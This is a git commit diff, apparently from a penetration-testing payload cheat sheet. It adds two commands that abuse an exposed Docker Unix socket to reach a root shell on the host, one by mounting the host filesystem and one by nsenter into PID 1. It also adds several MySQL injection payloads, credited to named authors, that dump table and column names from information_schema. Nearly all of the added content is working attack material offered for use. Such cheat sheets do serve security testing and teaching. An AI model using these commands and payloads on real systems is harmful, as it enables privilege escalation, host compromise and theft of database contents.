Docker Privesc - Unix socket

2024-11-10 07:04:22 +00:00 · 2019-08-30 17:25:07 +02:00 · 2019-08-30 17:25:07 +02:00 · 3ca07aeb7a
commit 3ca07aeb7a
parent 2a4c4f46b2
2 changed files with 20 additions and 0 deletions
--- a/Resources/Linux
+++ b/Resources/Linux
@ -574,6 +574,13 @@ sh-5.0# id
 uid=0(root) gid=0(root) groups=0(root)
 ```

+More docker privilege escalation using the Docker Socket.
+
+```powershell
+sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
+sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
+```
+
 ### LXC/LXD

 The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
--- a/Injection/MySQL
+++ b/Injection/MySQL
@ -250,7 +250,20 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))

 ```sql
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
+
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
+
+-- SecurityIdiots
+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
+
+-- Profexer
+(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
+
+-- Dr.Z3r0
+(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))
+
+-- M@dBl00d
+(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
 ```

 ## MYSQL Current queries